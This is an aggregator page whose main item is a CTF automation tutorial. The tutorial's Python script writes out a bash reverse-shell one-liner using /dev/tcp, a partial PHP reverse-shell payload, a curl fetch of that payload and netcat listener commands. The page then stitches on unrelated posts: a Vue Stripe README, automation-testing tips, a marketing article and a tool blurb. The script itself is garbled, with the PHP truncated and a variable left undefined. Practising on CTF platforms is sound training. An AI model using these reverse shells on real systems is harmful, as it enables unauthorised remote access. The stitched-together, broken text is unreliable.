Michio JP

Michio JP


Automate Some Default Content in CTF



In Tamil language

Automate some default stuffs that we do in a CTF

If you can understand Tamil language then watch this video 👇 

Tutorial Video link: https://youtu.be/C9EAKWY37cQ 

I explained every step clearly here 

In English language 👇


Here we're going to automate some tasks that we do when playing CTFs (Specially for HackTheBox and TryHackMe)


Our plan

1)  Finding the tun0 IP of our machine
2)  Creating bash and php-rev-shell payloads for that IP
3)  Checking the Machine IP is in live or not
4)  If it's live then opening it in a web browser
5)  Running port scan
6)  Directory Brute-forcing
7)  Opening required terminals
8)  Starting a python server to send payload files
9)  Starting a netcat to get shell
10) Opening Metasploit
11) Save-time.txt

So this is our plan, we're going to automate these tasks. Let's go step by step


Importing required modules

from os import system as cmd
from time import sleep
import pyautogui as py
import subprocess
import re
import webbrowser 

We need Machine IP to use it in future tasks, so let's assign it here



Finding the tun0 IP of our machine

with open('ip.txt','w') as f:
        ip = subprocess.run(['ip', 'a'],stdout=f,text=True)

Here we're running ip a command and redirecting the stdout to f . So, We can save the result in "ip.txt" file


Seperating tun0 IP from "ip.txt"

txt_file = open('ip.txt','r')
IP = txt_file.read()
pattern = re.compile("[10]+\.+[10]+\.+\d\d+\.+\w{2,3}")
search_tun0 = pattern.findall(IP)
tun0_IP = search_tun0[0]
print("TUN0 IP FOUND:",tun0_IP)

Here we opened "ip.txt" file and searching a specific pattern in it

generating bash revshell and php-rev-shell payloads

bash rev shell

port = "9001"
rev_shell = "bash -c 'bash -i >& /dev/tcp/"+tun0_IP+"/"+port+" 0>&1\'"
shell_txt = open('shell.sh','w')
cmd('echo " " >> shell.sh') # to avoid that '#' char in last part of code

creating "shell.sh" file and writing bash-rev-shell payload in it

php rev shell

rev_txt = open('php-rev-shell.php','w')

creating "php-rev-shell.php" file and writing php-rev-shell payload in it

rev_txt.write(''' array("pipe", "r"),  // stdin is a pipe that the child will read from
   1 => array("pipe", "w"),  // stdout is a pipe that the child will write to
   2 => array("pipe", "w")   // stderr is a pipe that the child will write to
$process = proc_open($shell, $descriptorspec, $pipes);
if (!is_resource($process)) {
        printit("ERROR: Can't spawn shell");
stream_set_blocking($pipes[0], 0);
stream_set_blocking($pipes[1], 0);
stream_set_blocking($pipes[2], 0);
stream_set_blocking($sock, 0);
printit("Successfully opened reverse shell to $ip:$port");
while (1) {
        if (feof($sock)) {
                printit("ERROR: Shell connection terminated");
        if (feof($pipes[1])) {
                printit("ERROR: Shell process terminated");
        $read_a = array($sock, $pipes[1], $pipes[2]);
        $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
        if (in_array($sock, $read_a)) {
                if ($debug) printit("SOCK READ");
                $input = fread($sock, $chunk_size);
                if ($debug) printit("SOCK: $input");
                fwrite($pipes[0], $input);
        if (in_array($pipes[1], $read_a)) {
                if ($debug) printit("STDOUT READ");
                $input = fread($pipes[1], $chunk_size);
                if ($debug) printit("STDOUT: $input");
                fwrite($sock, $input);
        if (in_array($pipes[2], $read_a)) {
                if ($debug) printit("STDERR READ");
                $input = fread($pipes[2], $chunk_size);
                if ($debug) printit("STDERR: $input");
                fwrite($sock, $input);

function printit ($string) {
        if (!$daemon) {
                print "$string\n";
print("\nPHP and BASH Rev Shell Files Created SUCESSFULLY")

Checking whether the IP is live or not

print("\nChecking whether the IP is live or not")
cmd("echo 'ping -w 3 '"+MACHINE_IP+" > cmd.sh")
with open('ping.txt','w') as ping:
        png = subprocess.run(['bash','cmd.sh'],stdout=ping,text=True)
ping = open('ping.txt','r')
ping_txt = ping.read()

if "100% packet loss" in ping_txt or "Host Unreachable" in ping_txt:

This part will check whether the Machine IP is in live or not, If it's offline or not reachable then the script will stops

creating htbs scan file

cmd('curl https://raw.githubusercontent.com/jopraveen/htbscan/main/htbs.py -o htbs.py')

I've created a small script to make the port scan faster. So here we're downloading it 

To know more about this script, watch this video: https://youtu.be/1Va6ws_o5w4

save time.txt

save_time_txt = open('save-time.txt','w')
curl http://'''+tun0_IP+''':8080/php-rev-shell.php'''



username: jopraveen
mail    : jopraveen@machine.htb
password: testtest

Here we're going to save our time by using this file... we can copy this when it's needed

removing unwanted files and arranging payloads in a folder

cmd('rm ip.txt ping.txt cmd.sh')
cmd('mkdir www && mv save-time.txt php-rev-shell.php shell.sh www/')

opening IP in web browser


Important part

The above things in the script are similar to everyone, but hereafter you need to create your own script... It's not same for everyone :/ 

I'll show you some examples to make it easier

Switching application

Just now we opened a browser, We need to switch back to terminal to run next tasks 

So find your hot key to switch between apps, Mine is ALT + TAB I hope this is also similar to most of the people


Ok now we done this, make sure you changed the hot key in the above script

Running port scan

py.write('python3 htbs.py '+ MACHINE_IP[-3:])

Now here we're running our fastest port scan script, It requires the last 3 digits of Machine IP as an argument to run the scan. So, I added MACHINE_IP[-3:] here 

And finally we need to press ENTER key to run this command

Spliting terminal vertically

We need to split our terminal and need to do directory bruteforcing there


My Hot key for splitting terminal vertically is CTRL + SHIFT + RIGHT Change your's there

Going to that terminal


If we press ALT + RIGHT then we can go to that splited terminal and we can type commands there and run it 

Change this if it's not same for you

Directory Brute Forcing

Here I'm using gobuster to brute-force the directories 

Change it if you use other tools also change your wordlist path too

py.write("gobuster dir -u http://"+MACHINE_IP+"/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-small.txt")

Now this will start the gobuster

opening required terminals

Now I'm going to open a new tab with 4 terminals 

See how we can do this

Automate some default stuffs that we do in a CTF

Here this is the hot key to open a new tab CRTL + SHIFT + T 
ok now let's see how to open it with 4 terminals

Automate some default stuffs that we do in a CTF

Go to your terminals settings and change this to 4 terminals

Automate some default stuffs that we do in a CTF

Now you'll get beautiful terminals like this :) 

Starting a netcat listener and a python server

py.write('nc -lvvnp 9005')

Now I'm moving to the right terminal by pressing ALT + TAB and splitting the terminal vertically by pressing CTRL + SHIFT + DOWN 
and starting a netcat listener

see how it looks like

Automate some default stuffs that we do in a CTF

I hope now you'll get an idea of what's happening here

Now python server

py.write('cd /home/kali/auto-ctf/www')
py.write('python3 -m http.server 8080')

Ok now we're moving upwards and going to our folder (our payloads folder) and starting a python server there

Opening Save-time.txt

py.write('cd /home/kali/auto-ctf/www')
py.write('cat save-time.txt')

Moving to the bottom last terminal and opeing our save-time.txt file

Opening Metasploit


Moving to left terminal and starting metasploit there

All Done

py.write('figlet "LET\'S GO" | lolcat -a -d 3')

Ok now we completed All the tasks, So printing "Let's Go" 


Make sure you changed all these stuffs, Then you can run this on your machine 

If you have any issues, Kindly post it in the issues page. 

I hope it's helpful to many peoples who do CTFs and It saves your valuable time

Thankyou :)

Download Details:

Author: jopraveen

Source Code: https://github.com/jopraveen/CTF-AUTOMATION


What is GEEK

Buddha Community

Automate Some Default Content in CTF

A Vue 2 Component Collection for Stripe.js

Vue Stripe Elements

Flexible and powerful Vue components for Stripe. It's a glue between Stripe.js and Vue component lifecycle.

  • Vue 2 component collection: stable âś…
  • Vue 3 version: in development 🚧


1. Install package:

# npm
npm i vue-stripe-elements-plus --save-dev

# yarn
yarn add vue-stripe-elements-plus --dev

2. Add Stripe.js library to the page:

<script src="https://js.stripe.com/v3/"></script>

Alternatively, you can load Stripe library dynamically. Just make sure it's ready before your components mount.

3. Use built-in components

Create card

  <div class="payment-simple">
      #default="{ elements }" // attention: important part!
    <button @click="pay" type="button">Pay</button>

import { StripeElements, StripeElement } from 'vue-stripe-elements-plus'

export default {
  name: 'PaymentSimple',

  components: {

  data () {
    return {
      stripeKey: 'pk_test_TYooMQauvdEDq54NiTphI7jx', // test key, don't hardcode
      instanceOptions: {
        // https://stripe.com/docs/js/initializing#init_stripe_js-options
      elementsOptions: {
        // https://stripe.com/docs/js/elements_object/create#stripe_elements-options
      cardOptions: {
        // reactive
        // remember about Vue 2 reactivity limitations when dealing with options
        value: {
          postalCode: ''
        // https://stripe.com/docs/stripe.js#element-options

  methods: {
    pay () {
      // ref in template
      const groupComponent = this.$refs.elms
      const cardComponent = this.$refs.card
      // Get stripe element
      const cardElement = cardComponent.stripeElement

      // Access instance methods, e.g. createToken()
      groupComponent.instance.createToken(cardElement).then(result => {
        // Handle result.error or result.token

4. Get advanced

Create multiple elements

  #default="{ elements }" // attention: important part!

5. Go wild

You can even create multiple groups, don't ask me why. It's possible.

  #default="{ elements }" // attention: important part!
  #default="{ elements }" // attention: important part!


No base style included. Main reason: overriding it isn't fun. Style as you wish via element options: see details.

API Reference


Think of it as of individual group of elements. It creates stripe instance and elements object.

import { StripeElements } from 'vue-stripe-elements-plus'


// https://stripe.com/docs/js/initializing#init_stripe_js-options
stripeKey: {
  type: String,
  required: true,
// https://stripe.com/docs/js/elements_object/create#stripe_elements-options
instanceOptions: {
  type: Object,
  default: () => ({}),
// https://stripe.com/docs/stripe.js#element-options
elementsOptions: {
  type: Object,
  default: () => ({}),


You can access instance and elements by adding ref to StripeElements component.

// data of StripeElements.vue
instance: {},
elements: {},

default scoped slot

Elegant solution for props. Really handy because you can make instance and elements available to all children without adding extra code.

<!-- Isn't it cool? I really like it! -->
<StripeElements #default="{elements, instance}">
  <StripeElement :elements="elements" />
  <CustomComponent :instance="instance" />


Universal and type agnostic component. Create any element supported by Stripe.


// elements object
// https://stripe.com/docs/js/elements_object/create
elements: {
  type: Object,
  required: true,
// type of the element
// https://stripe.com/docs/js/elements_object/create_element?type=card
type: {
  type: String,
  default: () => 'card',
// element options
// https://stripe.com/docs/js/elements_object/create_element?type=card#elements_create-options
options: {
  type: [Object, undefined],




Element options are reactive. Recommendation: don't use v-model on StripeElement, instead pass value via options.

data() {
  return {
    elementOptions: {
      value: {
        postalCode: ''

methods: {
  changePostalCode() {
    // will update stripe element automatically
    this.elementOptions.value.postalCode = '12345'


Following events are emitted on StripeElement

  • change
  • ready
  • focus
  • blur
  • escape


In case you like the manual gearbox. Check stripeElements.js for details.

import { initStripe, createElements, createElement } from 'vue-stripe-elements-plus'

Download Details:
Author: ectoflow
Download Link: Download The Source Code
Official Website: https://github.com/ectoflow/vue-stripe-elements
License: MIT
#vue #stripe

Origin Scale

Origin Scale


Automation Management System

Want to try automated inventory management system for small businesses? Originscale automation software automate your data flow across orders, inventory, and purchasing. TRY FOR FREE

#automation #automation software #automated inventory management #automated inventory management system #automation management system #inventory automation

Mikel  Okuneva

Mikel Okuneva


Automation Testing Tips

Thorough testing is crucial to the success of a software product. If your software doesn’t work properly, chances are strong that most people won’t buy or use it…at least not for long. But testing to find defects or bugs is time-consuming, expensive, often repetitive, and subject to human error. Automated testing, in which Quality Assurance teams use software tools to run detailed, repetitive, and data-intensive tests automatically, helps teams improve software quality and make the most of their always-limited testing resources.

Use these top tips to ensure that your software testing is successful and you get the maximum return on investment (ROI):

  1. Decide What Test Cases to Automate
  2. Test Early and Test Often
  3. Select the Right Automated Testing Tool
  4. Divide your Automated Testing Efforts
  5. Create Good, Quality Test Data
  6. Create Automated Tests that are Resistant to Changes in the UI

Decide What Test Cases to Automate

It is impossible to automate all testing, so it is important to determine what test cases should be automated first.

The benefit of automated testing is linked to how many times a given test can be repeated. Tests that are only performed a few times are better left for manual testing. Good test cases for automation are ones that are run frequently and require large amounts of data to perform the same action.

You can get the most benefit out of your automated testing efforts by automating:

  • Repetitive tests that run for multiple builds.
  • Tests that tend to cause human error.
  • Tests that require multiple data sets.
  • Frequently used functionality that introduces high-risk conditions.
  • Tests that are impossible to perform manually.
  • Tests that run on several different hardware or software platforms and configurations.
  • Tests that take a lot of effort and time when manual testing.

Success in test automation requires careful planning and design work. Start out by creating an automation plan. This allows you to identify the initial set of tests to automate and serve as a guide for future tests. First, you should define your goal for automated testing and determine which types of tests to automate. There are a few different types of testing, and each has its place in the testing process. For instance, unit testing is used to test a small part of the intended application. To test a certain piece of the application’s UI, you would use functional or GUI testing.

After determining your goal and which types of tests to automate, you should decide what actions your automated tests will perform. Don’t just create test steps that test various aspects of the application’s behavior at one time. Large, complex automated tests are difficult to edit and debug. It is best to divide your tests into several logical, smaller tests. It makes your test environment more coherent and manageable and allows you to share test code, test data, and processes. You will get more opportunities to update your automated tests just by adding small tests that address new functionality. Test the functionality of your application as you add it, rather than waiting until the whole feature is implemented.

When creating tests, try to keep them small and focused on one objective. For example, separate tests for read-only versus reading/write tests. This allows you to use these individual tests repeatedly without including them in every automated test.

Once you create several simple automated tests, you can group your tests into one, larger automated test. You can organize automated tests by the application’s functional area, major/minor division in the application, common functions, or a base set of test data. If an automated test refers to other tests, you may need to create a test tree, where you can run tests in a specific order.

Test Early and Test Often

To get the most out of your automated testing, testing should be started as early as possible and ran as often as needed. The earlier testers get involved in the life cycle of the project the better, and the more you test, the more bugs you find. Automated unit testing can be implemented on day one and then you can gradually build your automated test suite. Bugs detected early are a lot cheaper to fix than those discovered later in production or deployment.

With the shift left movement, developers and advanced testers are now empowered to build and run tests. Tools allow users to run functional UI tests for web and desktop applications from within their favorite IDEs. With support for Visual Studio and Java IDEs such as IntelliJ and Eclipse, developers never have to leave the comfort of their ecosystem to validate application quality meaning teams can quickly and easily shift left to deliver software faster.

Select the Right Automated Testing Tool

Selecting an automated testing tool is essential for test automation. There are a lot of automated testing tools on the market, and it is important to choose the automated testing tool that best suits your overall requirements.

Consider these key points when selecting an automated testing tool:

  • Support for your platforms and technology. Are you testing .Net, C# or WPF applications and on what operating systems? Are you going to test web applications? Do you need support for mobile application testing? Do you work with Android or iOS, or do you work with both operating systems?
  • Flexibility for testers of all skill levels. Can your QA department write automated test scripts or is there a need for keyword testing?
  • Feature-rich but also easy to create automated tests. Does the automated testing tool support record and playback test creation as well as manual creation of automated tests; does it include features for implementing checkpoints to verify values, databases, or key functionality of your application?
  • Create automated tests that are reusable, maintainable, and resistant to changes in the applications UI. Will my automated tests break if my UI changes?

For detailed information about selecting automated testing tools for automated testing, see Selecting Automated Testing Tools.

Divide Your Automated Testing Efforts

Usually, the creation of different tests is based on QA engineers’ skill levels. It is important to identify the level of experience and skills for each of your team members and divide your automated testing efforts accordingly. For instance, writing automated test scripts requires expert knowledge of scripting languages. Thus, in order to perform these tasks, you should have QA engineers that know the script language provided by the automated testing tool.

Some team members may not be versed in writing automated test scripts. These QA engineers may be better at writing test cases. It is better when an automated testing tool has a way to create automated tests that do not require an in-depth knowledge of scripting languages.

You should also collaborate on your automated testing project with other QA engineers in your department. Testing performed by a team is more effective for finding defects and the right automated testing tool allows you to share your projects with several testers.

Create Good, Quality Test Data

Good test data is extremely useful for data-driven testing. The data that should be entered into input fields during an automated test is usually stored in an external file. This data might be read from a database or any other data source like text or XML files, Excel sheets, and database tables. A good automated testing tool actually understands the contents of the data files and iterates over the contents in the automated test. Using external data makes your automated tests reusable and easier to maintain. To add different testing scenarios, the data files can be easily extended with new data without needing to edit the actual automated test.

Typically, you create test data manually and then save it to the desired data storage. However, you will find tools that provide you with the Data Generator that assists you in creating Table variables and Excel files that store test data. This approach lets you generate data of the desired type (integer numbers, strings, boolean values, and so on) and automatically save this data to the specified variable or file. Using this feature, you decrease the time spent on preparing test data for data-driven tests.

Creating test data for your automated tests is boring, but you should invest time and effort into creating data that is well structured. With good test data available, writing automated tests becomes a lot easier. The earlier you create good-quality data, the easier it is to extend existing automated tests along with the application’s development.

Create Automated Tests That Are Resistant to Changes in the UI

Automated tests created with scripts or keyword tests are dependent on the application under test. The user interface of the application may change between builds, especially in the early stages. These changes may affect the test results, or your automated tests may no longer work with future versions of the application. The problem is automated testing tools use a series of properties to identify and locate an object. Sometimes a testing tool relies on location coordinates to find the object. For instance, if the control caption or its location has changed, the automated test will no longer be able to find the object when it runs and will fail. To run the automated test successfully, you may need to replace old names with new ones in the entire project, before running the test against the new version of the application. However, if you provide unique names for your controls, it makes your automated tests resistant to these UI changes and ensures that your automated tests work without having to make changes to the text itself. This also eliminates the automated testing tool from relying on location coordinates to find the control, which is less stable and breaks easily.

#automation-testing-tool #automation-testing #automation-tips #automation-software #automation

How To Create User-Generated Content? [A Simple Guide To Grow Your Brand]

This is image title

In this digital world, online businesses aspire to catch the attention of users in a modern and smarter way. To achieve it, they need to traverse through new approaches. Here comes to spotlight is the user-generated content or UGC.

What is user-generated content?
“ It is the content by users for users.”

Generally, the UGC is the unbiased content created and published by the brand users, social media followers, fans, and influencers that highlight their experiences with the products or services. User-generated content has superseded other marketing trends and fallen into the advertising feeds of brands. Today, more than 86 percent of companies use user-generated content as part of their marketing strategy.

In this article, we have explained the ten best ideas to create wonderful user-generated content for your brand. Let’s start without any further ado.

  1. Content From Social Media Platforms
    In the year 2020, there are 3.81 million people actively using social media around the globe. That is the reason social media content matters. Whenever users look at the content on social media that is posted by an individual, then they may be influenced by their content. Perhaps, it can be used to gain more customers or followers on your social media platforms.

This is image title

Generally, social media platforms help the brand to generate content for your users. Any user content that promotes your brand on the social media platform is the user-generated content for your business. When users create and share content on social media, they get 28% higher engagement than a standard company post.

Furthermore, you can embed your social media feed on your website also. you can use the Social Stream Designer WordPress plugin that will integrate various social media feeds from different social media platforms like Facebook, Twitter, Instagram, and many more. With this plugin, you can create a responsive wall on your WordPress website or blog in a few minutes. In addition to this, the plugin also provides more than 40 customization options to make your social stream feeds more attractive.

  1. Consumer Survey
    The customer survey provides powerful insights you need to make a better decision for your business. Moreover, it is great user-generated content that is useful for identifying unhappy consumers and those who like your product or service.

In general, surveys can be used to figure out attitudes, reactions, to evaluate customer satisfaction, estimate their opinions about different problems. Another benefit of customer surveys is that collecting outcomes can be quick. Within a few minutes, you can design and load a customer feedback survey and send it to your customers for their response. From the customer survey data, you can find your strengths, weaknesses, and get the right way to improve them to gain more customers.

  1. Run Contests
    A contest is a wonderful way to increase awareness about a product or service. Contest not just helps you to enhance the volume of user-generated content submissions, but they also help increase their quality. However, when you create a contest, it is important to keep things as simple as possible.

Additionally, it is the best way to convert your brand leads to valuable customers. The key to running a successful contest is to make sure that the reward is fair enough to motivate your participation. If the product is relevant to your participant, then chances are they were looking for it in the first place, and giving it to them for free just made you move forward ahead of your competitors. They will most likely purchase more if your product or service satisfies them.

Furthermore, running contests also improve the customer-brand relationship and allows more people to participate in it. It will drive a real result for your online business. If your WordPress website has Google Analytics, then track contest page visits, referral traffic, other website traffic, and many more.

  1. Review And Testimonials
    Customer reviews are a popular user-generated content strategy. One research found that around 68% of customers must see at least four reviews before trusting a brand. And, approximately 40 percent of consumers will stop using a business after they read negative reviews.

The business reviews help your consumers to make a buying decision without any hurdle. While you may decide to remove all the negative reviews about your business, those are still valuable user-generated content that provides honest opinions from real users. Customer feedback can help you with what needs to be improved with your products or services. This thing is not only beneficial to the next customer but your business as a whole.

This is image title

Reviews are powerful as the platform they are built upon. That is the reason it is important to gather reviews from third-party review websites like Google review, Facebook review, and many more, or direct reviews on a website. It is the most vital form of feedback that can help brands grow globally and motivate audience interactions.

However, you can also invite your customers to share their unique or successful testimonials. It is a great way to display your products while inspiring others to purchase from your website.

  1. Video Content
    A great video is a video that is enjoyed by visitors. These different types of videos, such as 360-degree product videos, product demo videos, animated videos, and corporate videos. The Facebook study has demonstrated that users spend 3x more time watching live videos than normal videos. With the live video, you can get more user-created content.

Moreover, Instagram videos create around 3x more comments rather than Instagram photo posts. Instagram videos generally include short videos posted by real customers on Instagram with the tag of a particular brand. Brands can repost the stories as user-generated content to engage more audiences and create valid promotions on social media.

Similarly, imagine you are browsing a YouTube channel, and you look at a brand being supported by some authentic customers through a small video. So, it will catch your attention. With the videos, they can tell you about the branded products, especially the unboxing videos displaying all the inside products and how well it works for them. That type of video is enough to create a sense of desire in the consumers.

Continue Reading

#how to get more user generated content #importance of user generated content #user generated content #user generated content advantages #user generated content best practices #user generated content pros and cons

Wiley  Mayer

Wiley Mayer


TestProject Open SDK for Java - Software Testing Material

TestProject is a free automation tool that promises to give painless automation experience. It has the feature of record and plays associated with a developer SDK. It also has the capability to build and utilize addons as per need. It is based on automation tools like Appium and Selenium.

Having said that, TestProject removes the complication of maintaining and downloading multiple browser drivers required for testing an application in various platforms and browsers. This is overcome by having an executable file that can run in the majority of browsers and devices.

#automation #automation testing #codeless test automation #scriptless test automation #test automation #testproject